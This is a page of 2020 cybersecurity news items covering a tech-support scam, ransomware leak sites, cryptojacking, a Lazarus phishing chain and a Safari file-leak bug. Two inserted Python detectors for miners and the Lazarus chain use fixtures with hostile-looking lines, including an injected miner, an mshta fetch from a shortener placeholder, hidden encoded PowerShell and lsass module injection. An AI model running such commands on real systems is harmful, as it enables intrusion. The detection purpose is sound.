More stories

  • FBI informant provides a glimpse into the inner workings of tech support scams

    Image: ZDNet

    US authorities have charged three suspects involved in a large-scale tech support scam operation after FBI agents arrested one of their co-conspirators and turned him into an informant.
    Evidence provided by the informant along with court documents filed in the case provide an in-depth glimpse at the techniques and inner workings of a modern-day tech support scam, from its earliest stages to the methods crooks use to launder funds obtained from defrauded victims.
    Of the three suspects named in the case, one was arrested earlier this year, and he pleaded guilty earlier this week.
    It all started with an informant
    However, while charges were filed in January this year, the investigation into this group began in May 2019, when the FBI arrested an Indian national on fraud-related charges.
    According to court documents obtained by ZDNet today, the suspect (hereinafter “the informant”) agreed to cooperate with investigators and become an informant for the FBI, seeking leniency from US authorities in his case.
    The informant admitted to FBI agents that he was an active member of a tech support scheme and gave up the names of three of his collaborators, all three Indian nationals.
    Two of the suspects owned call centers in India, while a third lived inside the US, where he acted as a money mule by receiving funds from victims into his US bank accounts, and then transferring the money to the call center operators.
    Publishers, brokers, and call centers
    The informant said that his role in the scheme was as a “broker,” and he sold “call traffic.” According to the informant, brokers are the second category/stage in an online tech support scam scheme.
    The first category is what the informant described as “publishers.” These are criminal groups that create the actual tech support websites that show misleading error messages and popups urging users to call a toll-free number.
    Publishers then ran online ads on platforms like Facebook on various topics, such as travel, and redirected users who clicked on the ads to their malicious sites.
    Brokers, the role the informant played, acted as intermediaries between the publishers and the call centers. Brokers managed telephony servers through which they sold “call traffic” either to a call center operator willing to buy it, depending on that call center’s capacity, or to other brokers whose client call centers had free capacity.
    The informant, who agreed to give the FBI access to his device and to have his calls recorded, said that most of these negotiations took place via WhatsApp and other online chat applications.
    Call center owners would get in touch with brokers, agree to a price per batch of calls, and provide a number to which the broker would re-route incoming calls from tech support scam victims.

    WhatsApp chat showing the informant selling “call traffic” from tech support scam site publishers to an Indian call center.
    The scheme in which the informant was involved used tech support pages that posed as Microsoft security alerts.
    The alerts told visitors they’d been infected with malware and that they had to call a phone number for further assistance from a Microsoft employee.
    Victims listed in the indictment were all elderly citizens who lacked technical skills to determine that the security alert was fake.
    Call center operators would often gain access to bank accounts
    Past IM chat logs and phone calls recorded by the FBI also allowed agents to learn how the scheme continued once victims connected to the call center.
    Per court documents, call center employees would operate by convincing callers they needed to download and install a version of the SupRemo remote control software on their computers.
    This software would allow call center operators to connect to the victim’s computer and resolve the supposed “technical issue.”
    At the end of this operation, victims would be asked to pay for the technical assistance they received, usually through a bank transfer or through gift cards acquired from local stores.
    According to a recorded phone call the informant had with one call center owner, call center operators would often ask victims to connect to their bank accounts while the operator would still have access to their systems, allowing the operator to collect bank account credentials.

    Conversation between the informant and a call center owner, with the call center owner admitting they had access to victims’ bank accounts.
    Similar experiences were also reported by past victims whom the FBI contacted during its investigation.

    Sample case cited by the FBI in court documents where the call center operator had direct access to the victim’s bank account.
    Money received as payments, or surreptitiously stolen from victims’ bank accounts, would usually be transferred to intermediary bank accounts controlled by money mules.
    Informant also served as money mule
    At the FBI’s request, the informant also agreed to serve as a money mule, and operated one of these intermediary bank accounts, which the FBI then used to track payments and the entities involved in these scams.
    Court documents list only a few of the victims who lost money as part of these scams, with estimated losses of tens of thousands of US dollars. However, the true losses from this operation are believed to be in the millions of US dollars, as the scheme appears to have been running since at least 2017 and most likely involved many more victims beyond the ones cited in court files.
    US authorities filed formal charges in January 2020 against three suspects the informant identified.
    The call center operators are still at large in India, but one money mule was arrested in February this year while trying to board a flight from New York to India.
    Named Abrar Anjum, the money mule pleaded guilty on Monday, according to a DOJ press release and court documents. He is scheduled to be sentenced in October and faces a maximum prison sentence of 20 years.

  • Conti (Ryuk) joins the ranks of ransomware gangs operating data leak sites

    Image: ZDNet

    It has now become a mainstream tactic for big ransomware groups to create so-called “leak sites” where they upload and leak sensitive documents from companies who refuse to pay the ransomware decryption fee.
    These “leak sites” are part of a new trend forming on the cybercriminal underground where ransomware groups are adopting a new tactic called “double extortion.”
    The perfect example of how ransomware gangs are currently using “leak sites” and “double extortion” to put pressure on victims to pay is the case of the University of Utah.
    Last week, the university’s management admitted to paying $457,000 to a ransomware gang even though it had recovered its encrypted files from earlier backups.
    In a statement posted on its website, the university justified the payment by revealing that the ransomware gang had threatened to leak files containing sensitive student data online if the university did not pay, regardless of whether it had recovered its original files.
    Dozens of ransomware groups operate leak sites
    Such incidents are becoming more common these days as more and more ransomware groups shift to operating a leak site to put additional pressure on victims.
    The good news is that not all ransomware gangs operate leak sites.
    However, this number has been steadily growing since December 2019, when the operators of the Maze ransomware launched the first-ever leak site.
    Today, the list of ransomware gangs who operate leak sites includes the likes of Ako, Avaddon, CLOP, Darkside, DoppelPaymer, Maze, Mespinoza (Pysa), Nefilim, NetWalker, RagnarLocker, REvil (Sodinokibi), and Sekhmet.
    Some of these groups are small-time operators that even malware analysts have barely heard of, but some, like Maze, DoppelPaymer, REvil, and NetWalker, are some of today’s largest ransomware threat actors, responsible for a large chunk of ransomware attacks.
    Other groups, like BitPaymer, WastedLocker, LockBit, ProLock, and the Dharma family, have not yet adopted leak sites. The reasons are unknown, but malware researchers have told this ZDNet reporter in previous conversations that some criminal groups like to operate without drawing too much attention to themselves — and leak sites tend to draw way too much attention from journalists, cyber-security firms, and law enforcement officials alike.
    Conti launches leak site
    But last week, we had another major ransomware group shift to this double-extortion tactic and launch a leak site.
    Known as Conti, this is a relatively new ransomware strain. However, reports from Arete, Bleeping Computer, and Carbon Black claim that Conti “is being operated by the same group that conducted Ryuk ransomware attacks in the past” — with Ryuk being one of the most active ransomware operations of the past two years and one of the biggest players on the ransomware scene.
    Discovered by a malware analyst going by the pseudonym of BreachKey, the Conti leak site is available at different URLs on both the public internet and the dark web.
    BreachKey says the site already lists 26 companies that have fallen victim to the group’s attacks and have declined to pay the ransom, and that for each company listed on the site, the Conti group has leaked documents obtained from their networks.

    Image: ZDNet
    All in all, the launch of yet another leak site shows that the double-extortion scheme is here to stay with ransomware gangs.
    This new trend also means changes need to take place in how companies treat ransomware attacks. While in the past victim companies only had to recover files and get back to day-to-day operations, today ransomware attacks almost always involve the theft of sensitive corporate data or employee and customer personal details.
    This, in turn, means that most ransomware incidents also require an in-depth incident response and broad network audits to discover lingering backdoors that could be used for future attacks, as well as public disclosure and data breach notifications, which are necessary whenever any type of personal user or employee data has been stolen.

  • No, no one has secretly installed a COVID-19 tracker onto your smartphone

    Some people, people who spend a great deal of time glued to their smartphones (devices that have active cellular connections and a built-in GPS receiver), are inexplicably worried that Apple and Google have installed a tracking app onto their phone in the form of a COVID-19 tracker.
    What you’re actually seeing is the groundwork that Apple and Google have done to allow governments and health agencies to develop their own COVID-19 trackers, and also to give the end-user the ability to turn the feature off if they want to. It’s not an app (technically it’s the API framework), and only approved apps can make use of the feature.
    And the end-user is in control of it. From installing the app, to removing it and erasing the data.
    Both companies issued a statement outlining their plans back in May.

    Apple rolled out the feature as part of its iOS 13.5 update for the iPhone. You can find it by going to Settings > Privacy > Health, under COVID-19 Exposure Logging. There it explains that an authorized app is required to turn the feature on.

    Screenshot: COVID-19 Exposure Logging

    For Android, Google rolled this out as part of an update to the Google app pushed via the Google Play Store, as opposed to users having to wait — potentially forever — for an Android update.
    For Android, go to Settings > Google and tap COVID-19 exposure notifications, where you’ll get all the details.

    Screenshot: COVID-19 exposure notifications

    Bottom line: no one has installed anything, and no one is tracking you using this feature. Maybe you’re being tracked in one of a myriad of other ways, but this isn’t one of them.

  • Browser-based cryptojacking sees sudden spike in activity in Q2 2020

    Image: Symantec

    Browser-based cryptocurrency mining, also known as cryptojacking, made a surprising comeback earlier this year, in the month of June.
    In its Threat Landscape Trends report for Q2 2020, US cyber-security vendor Symantec said cryptojacking saw a 163% increase in detections, compared to the previous quarters.
    The spike in activity is extremely uncharacteristic for this particular threat, which security experts had considered long dead.
    A short history of browser-based cryptojacking
    The glory days of browser-based cryptocurrency mining (cryptojacking) lasted from September 2017 to March 2019, during which time browser-based cryptojacking became one of the most prevalent forms of cyber-attack.
    The rise of this particular malware trend coincided with the launch and shutdown of Coinhive, a German-based web service that allowed users to mine the Monero cryptocurrency inside their own website just by adding a small JavaScript library (coinhive.js) to their sites’ source code.
    While the service launched as an alternative website monetization scheme to classic online ads, the service became very popular with cybercrime groups.
    Cybercriminals would often hack into websites across the world and secretly load Coinhive’s library on the sites, but configured to mine Monero for the criminal groups.
    However, in March 2019, out of the blue, the Coinhive operators announced they were shutting down, citing various reasons, including the growing difficulty and diminishing efficiency of mining Monero inside web browsers.
    Furthermore, by that time browser makers had also had enough of malicious groups slowing down websites and had started deploying security features to detect and block cryptojacking operations.
    In addition, academic teams also began looking into the scheme’s efficiency. For example, an academic paper published in August 2019 discovered that cryptojacking was incredibly inefficient at generating revenue, despite its popularity among cybercrime groups, with just three classic online ads generating 5.5 times more revenue than a web-based cryptojacking script.
    These were the reasons why, after Coinhive’s shutdown in the spring of 2019, detections of cryptojacking attacks went off a cliff and flatlined at almost non-existent levels, as most cybercrime gangs moved on to other tactics.
    Router-hijacking botnet suspected
    Prior to today’s report, Symantec said, cryptojacking detections had been at the same low levels for months.
    While the company could not be reached for comment on the source of the June spike, a source in the antivirus industry told ZDNet today that the sudden surge in cryptojacking detections was most likely caused by a router botnet.
    The source, who did not want to be identified by name for this report, said that such incidents have happened before, and usually in Latin America.
    Malware groups often hack into home routers and change DNS settings to hijack legitimate web traffic, use the hacked routers as proxies, or abuse them to launch DDoS attacks.
    In some rare instances, some groups will also experiment with other ways of monetizing their router botnets, such as deploying cryptojacking scripts, usually modified versions of the old coinhive.js library, updated to work without the now-defunct Coinhive service.
    However, despite the sudden spike in browser-based cryptojacking detections in June, a full comeback is not expected. Most cybercrime groups that experimented with cryptojacking operations in the past dropped them weeks later, having discovered that browser-based cryptocurrency mining was both a waste of their time and too noisy, drawing more attention to their operations than profits.
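The article describes two delivery paths for the same payload: a coinhive.js library loaded into a compromised site, and modified copies of that library injected by router botnets that hijack DNS. Either way, the artefact a defender can look for is the same: a miner library reference plus an inline call that starts the miner. The scanner below is an added example, not Symantec’s detection logic. coinhive.js and the CoinHive.Anonymous constructor are real Coinhive artefacts; the other indicator names, the risk scoring, and the sample page (with a TEST-NET address standing in for the injected host) are constructed for illustration.

```python
"""Scan a web page's scripts for Coinhive-style in-browser mining indicators.
Added example, not Symantec's detection logic; the indicator patterns and
the sample page below are constructed for illustration."""
import re
from html.parser import HTMLParser
from typing import List, Tuple

# coinhive.js and the CoinHive.Anonymous/User/Token constructors are the real
# Coinhive artefacts; the remaining names are assumed generic miner indicators.
MINER_LIBRARY_RE = re.compile(r"\b(coinhive|coin-hive|cryptonight|miner)[^/\"']*\.js\b", re.I)
MINER_API_RE = re.compile(r"new\s+CoinHive\.(Anonymous|User|Token)\s*\(", re.I)
STRATUM_RE = re.compile(r"stratum\+tcp://", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._in_script = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_html(html: str) -> List[Tuple[str, str]]:
    """Return (indicator, evidence) pairs for every miner sign found."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings: List[Tuple[str, str]] = []
    for src in parser.external:
        if MINER_LIBRARY_RE.search(src):
            findings.append(("external_miner_library", src))
    for body in parser.inline:
        if m := MINER_API_RE.search(body):
            findings.append(("inline_miner_api", m.group(0)))
        if m := STRATUM_RE.search(body):
            findings.append(("stratum_pool_reference", m.group(0)))
    return findings


def risk_level(findings: List[Tuple[str, str]]) -> str:
    """'high' when a miner library or pool is referenced AND a miner is started."""
    kinds = {k for k, _ in findings}
    if "inline_miner_api" in kinds and kinds & {"external_miner_library", "stratum_pool_reference"}:
        return "high"
    return "medium" if kinds else "none"


# Constructed page: a legitimate analytics script, then an injected miner
# library (served from a TEST-NET address) and the inline call that starts it.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example.com/analytics.js"></script>
<script src="http://198.51.100.7/static/coinhive.min.js"></script>
</head><body>
<p>Welcome</p>
<script>
  var miner = new CoinHive.Anonymous('CONSTRUCTED_SITE_KEY', {throttle: 0.3});
  miner.start();
</script>
<script>console.log("harmless inline script");</script>
</body></html>"""

if __name__ == "__main__":
    for kind, evidence in scan_html(SAMPLE_HTML):
        print(f"{kind}: {evidence}")
    print("risk:", risk_level(scan_html(SAMPLE_HTML)))
```

Run against HTML fetched through the resolver a client actually uses, not a known-good one, since the router-hijacking case in the article serves the injected page only to clients whose DNS has been changed; a clean copy fetched from the security team’s own network would show nothing.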

  • Microsoft: This Office 365 feature update lets you open attachments without fear of malware

    Microsoft is edging closer to general availability of its Application Guard security technology for Microsoft 365 apps, which gives IT admins and security staff a little more assurance that users opening risky attachments won’t cause a malware outbreak. 
    Application Guard offers additional protections for enterprises using Word, Excel, and PowerPoint for Microsoft 365 and Windows 10 Enterprise. 

    Microsoft argues that Application Guard for Office or Microsoft Defender Application Guard for Office “helps prevent untrusted files from accessing trusted resources, keeping your enterprise safe from new and emerging attacks”.
    Microsoft released the private preview of Application Guard for Office in February, extending a feature that had until then only been available for the new Edge browser. 
    The feature allows users to open websites safely with the protection of hardware-level containerization. It isolates browser processes from the underlying operating system and the device.
    “To help protect your users, Office opens files from potentially unsafe locations in Application Guard, a secure container that is isolated from the device through hardware-based virtualization,” Microsoft said in a blogpost about the public preview. 
    “When Office opens files in Application Guard, users can securely read, edit, print, and save those files without having to reopen files outside the container.”
    The feature will be off by default and it is only available to customers with Microsoft 365 E5 or Microsoft 365 E5 Security licenses.
    PCs need to be running Windows 10 Enterprise, version 2004 (20H1, build 19041), and have Office Beta Channel build version 2008 (16.0.13212) or later, according to Microsoft’s technical documents.
    Microsoft Defender Advanced Threat Protection (ATP) works with Application Guard for Office to monitor and raise alerts about malware in the isolated environment.
    Microsoft notes a few restrictions that the technology creates. For example, it prevents an untrusted document from accessing trusted resources. Admins may need to turn off the feature if a user wants to access files across boundaries. Also, macros and ActiveX controls are disabled in Application Guard for Office.


  • Lazarus group strikes cryptocurrency firm through LinkedIn job adverts

    The Lazarus group is on the hunt for cryptocurrency once more and has now launched a targeted attack against a crypto organization by exploiting the human element of the corporate chain.

    On Tuesday, cybersecurity researchers from F-Secure said the cryptocurrency organization is one of the latest victims in a global campaign which has targeted businesses in at least 14 countries including the UK and US. 
    Lazarus is an advanced persistent threat (APT) group thought to be tied to North Korea. Economic sanctions imposed on the country over its nuclear programs, human rights abuses, and more may explain the group’s focus on financially motivated attacks, which in the past three years have expanded to include cryptocurrency.
    The US government says Lazarus was formed in 2007, and since then researchers have attributed to the group the global WannaCry attack wave, the $80 million Bangladeshi bank heist, and the 2018 HaoBao Bitcoin-stealing campaign.
    According to F-Secure, the latest Lazarus attack was tracked through a LinkedIn job advert. The human target, a system administrator, received a phishing document in their personal LinkedIn account relating to a blockchain technology company seeking a new sysadmin with the employee’s skill set.
    The phishing email is similar to Lazarus samples already made available on VirusTotal, including the same names, authors, and word count elements. 
    As is the case with many phishing documents, the attacker needs to entice the victim into enabling the macros that hide the malicious code for them to be effective. In this case, the Microsoft Word document claimed to be protected under the EU’s General Data Protection Regulation (GDPR), so its content could supposedly only be shown if macros were enabled.
    Once permission was granted, the document’s macro created a .LNK file designed to run mshta.exe and reach out to a bit.ly link that served a VBScript.
    This script conducts system checks and sends operational information to a command-and-control (C2) server. The C2 provides a PowerShell script able to fetch Lazarus malware payloads. 
    The infection chain changes depending on system configuration and a range of tools are used by the threat actors. These include two backdoor implants similar to those already documented by Kaspersky (.PDF) and ESET. 
    Lazarus is also using a custom portable executable (PE) loader, loaded into the lsass.exe process as a ‘security’ package that modifies registry keys using the schtasks Windows utility. Other malware variants used by Lazarus are able to execute arbitrary commands, decompress data in memory, as well as download and execute additional files. These samples, including a file called LSSVC.dll, were also used to connect backdoor implants to other target hosts. 
    A tailored version of Mimikatz is used to harvest credentials from an infected machine, especially those with financial value — such as cryptocurrency wallets or online bank accounts. 
    F-Secure says that Lazarus has attempted to avoid detection by wiping evidence, including deleting security events and logs. However, it was still possible to snag a few samples of the APT’s current toolkit to investigate the group’s current activities. 
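The chain above leaves a recognisable trail in endpoint telemetry: an Office process writing a .LNK and spawning mshta.exe, mshta.exe reaching for a URL shortener, PowerShell launched from a script host, schtasks.exe creating a task from that script chain, a module loaded into lsass.exe from outside System32, and finally the audit log being cleared (Windows event 1102). The script below is an added example, not F-Secure’s code: it runs simple rules over process, file, image-load and log events and only calls the host compromised when several distinct stages fire together, since each rule on its own is noisy. The event schema, the sample events, and the file paths in them (the LSSVC.dll location included) are constructed for illustration; bit.ly is the shortener named in the article and the other two are assumed extras.

```python
"""Flag the stages of the Office-macro -> .LNK -> mshta.exe -> PowerShell ->
scheduled task -> log-wiping chain described above in endpoint telemetry.
Added example; not F-Secure's code.  The Event schema and all sample
events below are constructed for this illustration."""
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# bit.ly is the shortener named in the article; the others are assumed extras.
SHORTENERS = ("bit.ly/", "tinyurl.com/", "t.co/")
SYSTEM32 = "c:\\windows\\system32\\"


@dataclass
class Event:
    id: int
    kind: str              # "process", "file", "imageload" or "log"
    image: str = ""        # process image, or the module loaded (imageload)
    parent: str = ""       # parent process image (process events)
    cmdline: str = ""      # command line (process events)
    target: str = ""       # file written (file) or host process (imageload)
    win_event_id: int = 0  # Windows event id (log events)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Event) -> Optional[str]:
    """Return the name of the first rule this single event matches, if any."""
    img, par, cmd = basename(ev.image), basename(ev.parent), ev.cmdline.lower()
    if ev.kind == "process":
        if par in OFFICE_APPS and img in SCRIPT_HOSTS | {"cmd.exe", "powershell.exe"}:
            return "office_spawns_script_host"
        if img == "mshta.exe" and any(s in cmd for s in SHORTENERS):
            return "mshta_fetches_shortened_url"
        if img == "powershell.exe" and par in SCRIPT_HOSTS:
            return "script_host_spawns_powershell"
        if img == "schtasks.exe" and "/create" in cmd and par in SCRIPT_HOSTS | {"powershell.exe", "cmd.exe"}:
            return "scripted_schtasks_persistence"
    elif ev.kind == "file":
        if img in OFFICE_APPS and ev.target.lower().endswith(".lnk"):
            return "office_writes_lnk"
    elif ev.kind == "imageload":
        if basename(ev.target) == "lsass.exe" and not ev.image.lower().startswith(SYSTEM32):
            return "lsass_loads_module_outside_system32"
    elif ev.kind == "log":
        if ev.win_event_id == 1102:  # "The audit log was cleared"
            return "security_log_cleared"
    return None


def analyze(events: List[Event]) -> List[Tuple[int, str]]:
    """Pair each matching event id with the rule it triggered."""
    return [(ev.id, rule) for ev in events if (rule := check_event(ev))]


def stages_observed(events: List[Event]) -> Set[str]:
    return {rule for _, rule in analyze(events)}


def is_chain(events: List[Event], min_stages: int = 3) -> bool:
    """Call the host compromised only when several distinct stages fire;
    any single rule is noisy on its own (admins run mshta and schtasks too)."""
    return len(stages_observed(events)) >= min_stages


WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
MSHTA = r"C:\Windows\System32\mshta.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry for one host: the lure document, the .LNK drop, the
# shortener fetch, the PowerShell stage, persistence, a module injected into
# lsass.exe, the audit log being cleared, and one benign mshta.exe run.
SAMPLE_EVENTS = [
    Event(1, "process", WORD, r"C:\Windows\explorer.exe", "WINWORD.EXE /n Job_Description.docm"),
    Event(2, "file", WORD, target=r"C:\Users\sysadmin\AppData\Local\Temp\update.lnk"),
    Event(3, "process", MSHTA, WORD, "mshta.exe https://bit.ly/PLACEHOLDER"),
    Event(4, "process", PS, MSHTA, "powershell -nop -w hidden -enc AAAA"),
    Event(5, "process", r"C:\Windows\System32\schtasks.exe", PS, "schtasks /create /tn Updater /tr C:\\Users\\Public\\u.ps1"),
    Event(6, "imageload", r"C:\Users\Public\LSSVC.dll", target=r"C:\Windows\System32\lsass.exe"),
    Event(7, "log", win_event_id=1102),
    Event(8, "process", MSHTA, r"C:\Windows\explorer.exe", "mshta.exe C:\\corp\\tools\\dashboard.hta"),
]

if __name__ == "__main__":
    for event_id, rule in analyze(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
    print("chain detected:", is_chain(SAMPLE_EVENTS))
```

The rules are ordered so that the most specific parent/child relationship wins; event 3 is reported as Office spawning a script host rather than as a shortener fetch, which keeps one event from inflating the stage count. The log-cleared rule is what survives the evidence wiping the article mentions: the cleared log itself is an event the attacker cannot easily remove without leaving another.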
    “It is F-Secure’s assessment that the group will continue to target organizations within the cryptocurrency vertical while it remains such a profitable pursuit, but may also expand to target supply chain elements of the vertical to increase returns and longevity of the campaign,” the researchers say.  

  • Global pandemic opening up can of security worms

    Caught by the sudden onslaught of COVID-19, most businesses lack or have inadequate security systems in place to support remote work and now have to deal with a new reality that includes a much wider attack surface and less secured user devices. Many also have had to adapt and adopt digital tools quickly, taking on new technology that may not be adequately secured.
    Already, 21% of organisations in Singapore revealed they had seen an increase in attacks on their IT systems due to the pandemic, according to a HackerOne report released this week. Some 58% of these businesses believed they were more likely to encounter a data breach as a result of the global pandemic, found the survey, which polled 200 respondents in the city-state. Conducted by Opinion Matters in July 2020, the HackerOne study polled 1,400 security professionals in Singapore, Australia, France, Germany, Canada, the UK, and the US. 
    Across the board, 64% felt it was likely their organisation would experience a data breach as a result of the pandemic. HackerOne CEO Marten Mickos said: “The COVID-19 crisis has shifted life online. As companies rush to meet remote work requirements and customer demands for digital services, attack surfaces have dramatically expanded, leaving security teams stretched thin and not staffed to cope.”

    With more employees working from home, it has become easier to launch attacks at enterprises, warned Eugene Kaspersky, CEO of Kaspersky, who was speaking at Kaspersky’s Asia-Pacific Online Policy Forum last week. 
    The security vendor saw a 25% increase in the number of new malicious apps to more than 400,000 a day, from 300,000 before the virus outbreak. Kaspersky said this was the reality today and why having the right cybersecurity strategy was even more important now amidst the pandemic. 
    Fellow panelist David Koh, Cyber Security Agency of Singapore’s (CSA) commissioner of cybersecurity and chief executive, concurred, noting that governments, industries, and individuals have had to change the way they live, work, and play, and all in a very short span of time. 
    Companies had to adapt to work from home arrangements and engage partners and customers online, Koh said. “Things that some thought were too difficult to do nine months ago have had to change overnight,” he said. “We had to fundamentally adapt and employ new technology literally overnight [and] a lot of this new technology is much less secured.”
    Databases, for example, had to be extended so employees could access them from their home environment and controls that were in place previously within physical workplaces were no longer relevant. 
    Instead, employees’ home Wi-Fi systems now were the main connectivity hubs and these were not as secured as the office environment, Koh said. An organisation’s risk profile had changed and it had to deal with a larger attack surface, he added.
    Employees had been taken out of offices and into homes, but organisations did not have security systems set up outside their enterprise walls, said Mark Johnston, Google Cloud’s Asia-Pacific head of security for networking and collaboration specialists. 
    Speaking to ZDNet in a video call, he noted that businesses now had to deal with devices outside of their network that they never had to manage before. Traditional virtual private network (VPN) tools might not necessarily work well as these could not scale well, Johnston said, adding that his team saw a sudden influx of customer queries on how to securely handle access from devices outside of their infrastructure.
    Cybercriminals also had adapted, widening their focus to tap public interest in COVID-19 as lures for scams, phishing, and ransomware attacks.
    New vulnerabilities also were exposed because users had moved outside of their enterprise environment and were no longer protected by a firewall, Johnston said, noting that Google’s machine learning platform dynamically adjusted to the spike in COVID-19 themed attacks. 
    He said the system clocked 3 billion COVID-related email communications in a week, of which 240 million were spam and 20 million were malware attacks. Some 99.9% were blocked before they could hit inboxes.
    Rajesh Pant, India’s National Cyber Security Coordinator, also noted a spike in online usage across his country due to the pandemic. The National Informatics Centre, which manages India’s e-government services and supports the public sector’s ICT needs, previously handled 20 million e-mail queries a day. This now has climbed to 70 million a day, according to Pant, who was speaking at the Kaspersky forum. Correspondingly, there has been a 600% increase in cybercrime. 
    To help its population safeguard their cyber space, he said the Indian government issued advisories, for example, to guide employees on working from home and running videoconferences securely, such as creating waiting rooms for Zoom. 
    There also had been increased focus on credentials and identity, since more were accessing the corporate network from different home and online environments, he noted. “The entire system has become distributed,” he said, stressing the need for a new cybersecurity architecture. 
    Noting that the often-cited critical areas of “people”, “process”, and “technology”, still held true in cybersecurity, Pant underscored the importance of educating users on safeguarding their own cyber hygiene. 
    Mihoko Matsubara, NTT’s chief cybersecurity strategist, said: “We’re now more vulnerable because so many companies have shifted abruptly to work-from-home and remote work arrangements.” She noted that 45% of organisations in Asia-Pacific had yet to provide training to guide employees on how to work securely when doing so remotely.
    Budgets also were likely to have been cut due to the uncertain economic climate, which further compounded the problem, Matsubara said. 

    According to a Barracuda Networks study, 40% of companies worldwide had their cybersecurity budget cut as a cost saving measure due to COVID-19. Some 51% said their workforce lacked proper training on the cyber risks associated with remote working and 51% had seen an increase in email phishing attacks since moving to a remote working model. 
    “We’ve had to adapt to the COVID-19 situation abruptly…[and] from a technology perspective, many of us were not ready,” Koh said. He noted that cybersecurity required a balance of the iron triangle comprising usability, security, and cost. 
    HackerOne’s Mickos noted that the outbreak also compelled organisations to realise they were slow with their digital transformation and cloud migration. Some 37% in Singapore said the pandemic pushed them to accelerate their digital transformation efforts, with nearly 40% admitting they were forced to do so without being fully prepared.
    “The strain this puts on security teams is immense,” he said. “Cost-cutting measures combined with an increase in attacks means data breaches present a significant threat to brand reputations that may have already taken a hit.”
    Need for common rule of cyber laws
    Koh pointed to “a strong need” to develop rules-based international order for cyberspace, similar to what the world already had for the physical domains of land, sea, air, and global trade. 
    In this aspect, he said Singapore believed the United Nations played an important role in facilitating dialogues and facilitating international cooperation. He noted that there already were ongoing efforts to establish an Asean cybersecurity framework. 
    Kaspersky noted that while he supported the need for a global federation, previous attempts to do so — including at the 2011 London Cyberspace Conference — had not resulted in anything substantial. 
    He expressed hope that the COVID-19 pandemic would encourage more nations to recognise the importance of such efforts and finally establish a working system for a safer cyberspace. This would be critical to help identify and stop cybercriminals across jurisdictions, he said.
    Matsubara welcomed the regulations within each region, but noted that the diversity between countries and even within smaller regions such as Asean, where there were different languages and cultures, would make it difficult to impose regulation across the board. And it would take years to establish such regulations. 
    So while it was important to have regulation to incentivise companies to implement good cybersecurity practices, she stressed the need to also educate governments, businesses, and individuals to ensure robust cybersecurity was embedded in every organisation. 
    “We use IT more during this pandemic, so cybersecurity needs to be everywhere and for everybody,” she said, urging a change in mindset.
    Johnston also called for more standardisation on regulations governing the use of data. He noted that there currently were different levels of maturity in regulatory and privacy laws and even between industries with regards to their use of ICT and how security was applied. 

    And while the European Union had a common data security framework in the General Data Protection Regulation (GDPR), Asia-Pacific still lacked a similar legal directive. This created challenges for multinational corporations looking to expand into the region, compelling them to comply with differing privacy and security legislation across the different markets, such as Singapore’s Personal Data Protection Act (PDPA) and the Reserve Bank of India’s laws on payment data, he said.
    Security needs to be ‘by default’, simpler
    Koh also advocated the need to simplify technology, which currently was too complex and difficult to manage. “We’re asking everyone including SMBs to be responsible for their own cybersecurity. This is impossible,” he said. “It needs to be made simple so everyone on the street can take care of their own cyber hygiene. It needs to be security by default, not just security by design.”
    Regulations, for instance, would help ensure telcos were doing the right things upstream, so consumers were delivered “a cleaner internet pipe”, he noted. Pointing to how water systems were commonly operated today, he said: “Now, [in cybersecurity] everyone’s left to purify their own water…isn’t it easier to have a central organisation purify it first [before it’s delivered through water pipes]? It should be the same with cybersecurity.”
    To facilitate such efforts, Koh said Singapore earlier this year introduced a labelling scheme to help increase consumer awareness about security when using Internet of Things (IoT) devices, specifically, home routers and smart home hubs. The initiative also aimed to push manufacturers to deploy enhanced cybersecurity measures and create a mandate for a set of minimum security requirements for home routers. 
    Noting that price, functionality, or colour typically were deciding factors when consumers purchased a tech product, he said few would consider the level of security in the device. The labelling scheme would help address this with its simple three-tick system, he added, where devices with three ticks were assessed to have good security features. 
    Tech vendors such as Google and Kaspersky are hoping to take the complexity out of security by tapping automation and artificial intelligence (AI). 
    Similar to its aim to democratise AI, Google hoped to do the same with security, Johnston said. The goal was to bring the ease-of-use focus it applied to its consumer products to its more advanced business security tools, he said. 
    Kaspersky also noted that AI and machine learning were essential in security to help those who were unable to help themselves. 
    Such tools would monitor enterprise environments to ensure users, as well as applications, were doing what they were expected to do and identify any abnormalities within the systems, he said. 
    Security researcher discloses Safari bug after Apple delays patch

    Image: REDTEAM.PL

    A security researcher has published details today about a Safari browser bug that could be abused to leak or steal files from users’ devices.
    The bug was discovered by Pawel Wylecial, co-founder of Polish security firm REDTEAM.PL.
    Wylecial initially reported the bug to Apple earlier this spring, in April, but the researcher decided to go public with his findings today after the OS maker delayed patching the bug for almost a year, to the spring of 2021.
    How does the bug work?
    In a blog post today, Wylecial said the bug resides in Safari’s implementation of the Web Share API — a new web standard that introduced a cross-browser API for sharing text, links, files, and other content.
    The security researcher says that Safari (on both iOS and macOS) supports sharing files that are stored on the user’s local hard drive (via the file:// URI scheme).
    This is a big privacy issue as this could lead to situations where malicious web pages might invite users to share an article via email with their friends, but end up secretly siphoning or leaking a file from their device.
    See the video below for a demonstration of the bug, or play with these two demo pages that can exfiltrate a Safari user’s /etc/passwd or browser history database files.
    [embedded content]
    Wylecial described the bug as “not very serious,” since user interaction and complex social engineering are needed to trick users into leaking local files; however, he also admitted that it was quite easy for attackers “to make the shared file invisible to the user.”
    Recent criticism of Apple’s patch handling
    However, the real issue here is not just the bug itself and how easy or complex it is to exploit it, but how Apple handled the bug report.
